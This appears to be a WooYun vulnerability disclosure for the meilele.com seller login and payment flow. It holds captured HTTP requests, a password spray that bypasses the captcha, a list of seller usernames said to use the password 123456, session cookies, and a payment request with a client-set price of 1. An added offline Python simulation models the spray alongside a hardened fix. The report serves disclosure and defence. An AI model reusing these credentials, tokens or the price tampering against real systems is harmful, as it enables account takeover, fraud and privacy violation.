WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reading -------- http://drop.zone.ci/
2016-01-20: Details sent to the vendor, awaiting vendor handling. 2016-01-21: Vendor confirmed; details visible to the vendor only. 2016-01-31: Details disclosed to core white hats and domain experts. 2016-02-10: Details disclosed to regular white hats. 2016-02-20: Details disclosed to intern white hats. 2016-03-05: Details disclosed to the public.
It all started with browsing for furniture...
1. Brute-forcing user accounts
POST /act_seller_login/ HTTP/1.1
Host: seller.meilele.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://seller.meilele.com/shop.html?act=shop_login
Content-Length: 74
Cookie: aliyungf_tc=AQAAAIkktUeVZAcA4RogCgOS4Lyql1Sk; ECS_ID=j464ee7098aab635c066a4f8412e1bf0178d9bc2
X-Forwarded-For: 10.32.26.225
Connection: close

act=login&username=lirong&password=123456&captcha2=&datetime=1453267597272
There is a captcha, but it is effectively not enforced: the request above submits captcha2 empty and the login is still processed. Spraying one password across 500 usernames:
Results (username and the value listed beside it in the report, which reads as a per-response length):
chenchao    660
chenfei     658
wangfei     656
zhoujie     655
lixin       649
lixin       649
zhangyong   644
ligang      643
lixiang     642
liushuai    642
(username not captured)  641
lirong      641
wangning    639
machao      639
wangxue     638
zhaowei     638
liuyan      637
lihua       637
liuyan      637
liqian      637
lidan       636
limei       636
limin       635
lijun       634
lipeng      631
All of them use the password 123456.
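The spray above, modelled offline as an added example (this is not code from the report or from the vendor): the login body is rebuilt exactly as captured, with captcha2 left empty, and run against two in-memory login handlers. `weak_login` behaves the way the report describes (captcha present in the form but not checked, no lockout); `hardened_login` is an assumed fix that verifies the captcha server-side and locks an account after five failures. The account store, the lockout threshold and the expected captcha value are constructed for the demo; the usernames and the endpoint path come from the report.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, urlencode

LOGIN_PATH = "/act_seller_login/"          # from the captured request

# Constructed sample account store (username -> password). Three of the
# sprayed names are given "123456", as the report found; the rest are invented.
FAKE_ACCOUNTS = {
    "chenchao": "123456",
    "chenfei": "123456",
    "wangfei": "Str0ng!pass",
    "lirong": "123456",
    "admin": "c0rrect-h0rse",
}

# A slice of the report's 500-name list.
SPRAY_LIST = ["chenchao", "chenfei", "wangfei", "zhoujie",
              "lixin", "zhangyong", "ligang", "lirong"]


def build_login_body(username, password, captcha=""):
    """Reproduce the captured form body; captcha2 is empty exactly as in the report."""
    return urlencode({
        "act": "login",
        "username": username,
        "password": password,
        "captcha2": captcha,
        "datetime": "1453267597272",
    })


def weak_login(body, state):
    """Models the reported behaviour: the captcha field is ignored and there is
    no lockout, so credentials are checked on every request."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    if FAKE_ACCOUNTS.get(fields["username"]) == fields["password"]:
        return '{"status":1,"msg":"login ok","redirect":"/shop.html?act=index"}'
    return '{"status":0,"msg":"bad credentials"}'


def hardened_login(body, state, captcha_expected="x7k2"):
    """Assumed fix (not the vendor's code): reject the request before touching
    credentials unless the captcha matches, and lock after 5 failures."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    user = fields["username"]
    if state["failures"][user] >= 5:
        return '{"status":0,"msg":"account locked"}'
    if not fields.get("captcha2") or fields["captcha2"] != captcha_expected:
        return '{"status":0,"msg":"captcha required"}'
    if FAKE_ACCOUNTS.get(user) == fields["password"]:
        state["failures"][user] = 0
        return '{"status":1,"msg":"login ok","redirect":"/shop.html?act=index"}'
    state["failures"][user] += 1
    return '{"status":0,"msg":"bad credentials"}'


def spray(usernames, password, login):
    """One password against many accounts. Returns {username: response length},
    the same view an Intruder run gives: successes have a different body length."""
    state = {"failures": defaultdict(int)}
    return {u: len(login(build_login_body(u, password), state)) for u in usernames}


def hits(lengths):
    """Treat the most common response length as the failure baseline and report
    every username whose response length differs from it."""
    by_len = defaultdict(list)
    for user, n in lengths.items():
        by_len[n].append(user)
    baseline = max(by_len, key=lambda n: len(by_len[n]))
    return sorted(u for n, users in by_len.items() if n != baseline for u in users)


def guess_one_account(username, passwords, login):
    """Many passwords against one account, with a valid captcha supplied, to show
    the lockout in the hardened handler taking effect."""
    state = {"failures": defaultdict(int)}
    return [login(build_login_body(username, p, captcha="x7k2"), state)
            for p in passwords]


if __name__ == "__main__":
    print("weak server, sprayed 123456 ->", hits(spray(SPRAY_LIST, "123456", weak_login)))
    print("hardened server, same spray   ->", hits(spray(SPRAY_LIST, "123456", hardened_login)))
    for r in guess_one_account("admin", [str(i) for i in range(7)], hardened_login):
        print(r)
```

Against the weak handler the length outliers are exactly the accounts with 123456; against the hardened handler every sprayed request is answered "captcha required" before any credential check, so the lengths are uniform and nothing leaks, and a per-account guessing run stops at "account locked" after the fifth failure. The captcha check must happen before the password comparison, otherwise response timing still distinguishes valid accounts.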
2. Payment
The request that fetches the payment link carries the order number and the amount (order_sn and price=1) as client-supplied form fields:

POST /user/?act=ajaxgetpaylink HTTP/1.1
Host: www.meilele.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.meilele.com/mll_api/api/pay
Content-Length: 80
Cookie: ECS_ID=j464ee7098aab635c066a4f8412e1bf0178d9bc2; aliyungf_tc=AQAAAIUkWzvqDggA4RogCkmTUups2ruV; RT=A; _i=17; _o=0; MA_si=i2snkcenskn; MLL_CID=ehinw6kf1p; region_name=%E5%85%A8%E5%9B%BD; __utma=184173242.1578908334.1453268083.1453268083.1453268083.1; __utmb=184173242.21.9.1453268226118; __utmc=184173242; __utmz=184173242.1453268083.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; pgv_pvi=7277789184; pgv_si=s2961014784; Hm_lvt_d91942b1e6dd95baed4560c0c6d8071b=1453268087; Hm_lpvt_d91942b1e6dd95baed4560c0c6d8071b=1453268540; _jzqa=1.1789671085672996600.1453268088.1453268088.1453268088.1; _jzqb=1.11.10.1453268088.1; _jzqc=1; _jzqckmp=1; ECS[email]=hao_lirong%40163.com; ECS[login_type]=mll; ECS[username]=lirong; autoLogin=VgHhEjJmzbCm3C860xohUI6pLnAqAX9aHk2LTIGSL6w%3D; meilele_login=1; user_id=965956; rember_username=lirong; utag=k0702*s0201*c0101*m0201*f1301*f1001*g0301; viewInfo=23035%2C1453268178612; bdshare_firstime=1453268182003; cart_number=1; isActiveUser=1; _qzja=1.1619587144.1453268087679.1453268087679.1453268087680.1453268526183.1453268539959.0.0.0.11.1; _qzjb=1.1453268087679.11.0.0.0; _qzjc=1; _qzjto=11.1.0
X-Forwarded-For: 10.32.26.225
Connection: keep-alive

merge=&order_sn=2016012051603&price=1&payment=alipay&pd_FrpId=&qr_code=&ispart=0
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2016-01-21 14:40
Thanks.
None yet.